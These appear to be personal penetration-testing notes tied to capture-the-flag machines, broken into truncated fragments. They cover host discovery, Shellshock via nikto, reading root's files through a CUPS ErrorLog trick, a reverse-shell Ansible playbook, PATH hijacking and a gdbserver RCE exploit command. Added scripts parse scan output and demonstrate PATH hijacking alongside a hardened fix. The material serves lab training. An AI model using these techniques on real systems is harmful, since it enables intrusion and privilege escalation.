To understand Spring4Shell, it is important to first understand CVE-2010-1622. Spring MVC (Model-View-Controller) is the part of the Spring Framework that makes it easy to develop web applications foll...
ARP-SCAN This tool sends ARP requests to a given IP or network and retrieves the MAC address of every host that answers (-g suppresses duplicate replies), which only works on the local segment: arp-scan -I tap0 -g 10.142.111.0/24 FPING Reconnaissance of alive hosts (ICMP sweep over a generated range): fping -I ens33 -g 10.10.0....
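The two sweeps above print banners, footers and (without -g) duplicate replies; the following is an added example, not part of the original notes, that parses both tools' output into one sorted list of live hosts so the ARP and ICMP results can be compared. The interface names and the sample outputs are constructed for the demo, not captured from a target.

```shell
#!/bin/sh
# Added example, not part of the original notes: turn the raw output of the
# two host-discovery sweeps into one clean list of live hosts.
# Usage with the real tools:  arp-scan -I tap0 -g 10.142.111.0/24 | arp_hosts
#                             fping -I ens33 -g 10.10.0.0/24 2>/dev/null | fping_hosts
# The sample outputs below are constructed for the demo, not captured from a target.

ARP_SAMPLE='Interface: tap0, type: EN10MB, MAC: 02:42:ac:11:00:02, IPv4: 10.142.111.2
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.142.111.1    52:54:00:12:34:56    QEMU
10.142.111.10   08:00:27:aa:bb:cc    PCS Systemtechnik GmbH
10.142.111.10   08:00:27:aa:bb:cc    PCS Systemtechnik GmbH (DUP: 2)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.102 seconds (121.79 hosts/sec). 2 responded'

FPING_SAMPLE='10.10.0.1 is alive
10.10.0.5 is alive
10.10.0.6 is unreachable
10.10.0.7 is alive'

# arp_hosts: reads arp-scan output on stdin, prints "ip mac" per responder.
# Only lines whose first field is a dotted quad are kept, which drops the
# banner/footer lines; sort -u collapses duplicate replies (seen without -g).
arp_hosts() {
  awk '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print $1, $2 }' | sort -u
}

# fping_hosts: reads fping output on stdin, prints only hosts reported alive.
# (fping -a prints bare IPs instead; this handles the default "<ip> is alive" form.)
fping_hosts() {
  awk '$2 == "is" && $3 == "alive" { print $1 }'
}

# merge_hosts: reads IPs on stdin, prints them deduplicated in numeric address order.
merge_hosts() {
  sort -u -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# Demo: union of both sweeps.
{
  printf '%s\n' "$ARP_SAMPLE" | arp_hosts | awk '{ print $1 }'
  printf '%s\n' "$FPING_SAMPLE" | fping_hosts
} | merge_hosts
```

A host that answers ARP but not ICMP is the interesting case: it is up but filtering ping, so it belongs in the port-scan list even though fping never reported it.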
Finding the Vulnerability First you need to find a script (.sh, .pl, .cgi, etc.), most commonly under the cgi-bin folder; the best tool for this task is nikto: nikto -h <IP> Testing the Vulnerabil...
LFI If you already have local access to the system (cupsctl talks to cupsd, which only accepts the change from a user allowed to administer CUPS), you can read arbitrary files by pointing the ErrorLog setting at the file you want to read: cupsctl ErrorLog="/root/root.txt" Then from the web server we need ...
YML RCE
Example to obtain a reverse shell using a test.yml playbook (sudo/sudo_user are the legacy Ansible 1.x spellings of become/become_user):
---
- name: Display known facts for host
  hosts: 127.0.0.1
  sudo: true
  sudo_user: root
  connection: local
  gather_facts: false
  ...
Drupal exploitation/enumeration Github: drupwn To get this tool working, first run its setup.py script: python setup.py install Then run the enumeration/exploitation binary ...
Library hijacking If a script loads a library or calls a command without its full path, you can plant your own copy earlier in the search path and run code as the user executing the script (sudo -l shows both what you may run and, in the Defaults entries, whether sudo keeps your PATH): alice@wonderland:/root$ sudo -l User ali...
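The mechanism behind the hijack, as an added example that is not from the original notes: a script that calls a command by bare name takes whatever copy PATH resolves first, and the fix is an absolute path plus a PATH the script sets itself. The script names (backup.sh, backup_fixed.sh) and the impostor are made up for the demo; everything runs in a temporary directory and needs no sudo to show the effect.

```shell
#!/bin/sh
# Added example, not part of the original notes: why a bare-name command call
# is hijackable through PATH, and what the hardened version looks like.
# Script and directory names are assumptions for the demo.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Vulnerable target: calls `id` by name, so whatever `id` PATH resolves first wins.
cat > "$WORK/backup.sh" <<'EOF'
#!/bin/sh
id
EOF

# Hardened target: absolute path, and a PATH the script controls itself.
cat > "$WORK/backup_fixed.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/usr/bin/id
EOF

# Attacker's payload: an `id` impostor in a directory the attacker can write.
mkdir -p "$WORK/evil"
cat > "$WORK/evil/id" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod +x "$WORK/backup.sh" "$WORK/backup_fixed.sh" "$WORK/evil/id"

# run_with_poisoned_path: run a target with the attacker's directory first in
# PATH, as the script would see it when PATH is inherited from the caller,
# and return the first line it prints.
run_with_poisoned_path() {
  PATH="$WORK/evil:$PATH" sh "$1" | sed -n 1p
}

echo "vulnerable: $(run_with_poisoned_path "$WORK/backup.sh")"
echo "hardened:   $(run_with_poisoned_path "$WORK/backup_fixed.sh")"
```

Through sudo this only works when the caller's PATH survives, i.e. sudo -l shows no secure_path in the Defaults, or env_keep includes PATH; with secure_path set, sudo replaces PATH before the script starts, and the same idea then has to target something the script resolves on its own, such as a relative library load or an import from a directory you can write to.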
On Windows the following command lists TCP sockets with their owning PIDs: netstat -ano -p tcp On Linux netstat's -p shows the owning process instead of selecting a protocol, so filter TCP with -t there, or use the modern equivalent, which lists listening TCP and UDP sockets numerically together with their processes: ss -tulnp Examples: [[StreamIO#^1d2840]] [[Antique#...
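What to look for in that listing is which services are bound only to loopback, because those are invisible from the network and need a tunnel to reach. The following is an added example, not from the original notes, that summarises ss -tulnp output one line per socket and flags the local-only ones; the sample output is constructed for the demo, not captured from a target.

```shell
#!/bin/sh
# Added example, not part of the original notes: summarise `ss -tulnp` output
# into "proto port address program scope" and flag loopback-only listeners.
# Usage on a real host:  ss -tulnp | listeners
# SS_SAMPLE is constructed for the demo, not captured from a target.

SS_SAMPLE='Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*         users:(("systemd-resolve",pid=512,fd=12))
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=801,fd=3))
tcp   LISTEN 0      511    127.0.0.1:3306      0.0.0.0:*         users:(("mysqld",pid=933,fd=21))
tcp   LISTEN 0      128    [::]:80             [::]:*            users:(("nginx",pid=1001,fd=6),("nginx",pid=1000,fd=6))
tcp   LISTEN 0      128    [::1]:8080          [::]:*'

# listeners: prints "proto port local-address program scope" per socket.
# The port is everything after the last ':' so IPv6 "[::]:80" splits correctly;
# the program is the first quoted name in the Process column, "-" when ss could
# not see it (not root, or the socket belongs to another user's process).
listeners() {
  awk 'NR > 1 {
    n = split($5, a, ":")
    port = a[n]
    addr = substr($5, 1, length($5) - length(port) - 1)
    prog = "-"
    if (match($0, /"[^"]+"/)) prog = substr($0, RSTART + 1, RLENGTH - 2)
    scope = (addr ~ /^127\./ || addr == "[::1]") ? "local-only" : "exposed"
    print $1, port, addr, prog, scope
  }'
}

# local_only: just the ports that need a tunnel (ssh -L, chisel, ...) to reach.
local_only() {
  listeners | awk '$5 == "local-only" { print $2 }'
}

printf '%s\n' "$SS_SAMPLE" | listeners
```

A listener with program "-" is worth a second look: ss could not read its owner, which usually means it belongs to a more privileged process than the one you are running as.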
Content WordPress Local File Inclusion Vulnerability (LFI) LFI to RCE (Abusing /proc/PID/cmdline) Gdbserver RCE Vulnerability Abusing Screen (Privilege Escalation) [Session synchronizatio...
If the exposed gdbserver is version 9.2 or earlier, it can be exploited for RCE with the public exploit below. (A gdbserver reachable over the network lets any client write memory and set registers in the debuggee by design and has no authentication, so the real precondition is that the port is reachable; 9.2 is the version the public exploit was written against.) Exploit: gdbserver sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin Examples: Backdoor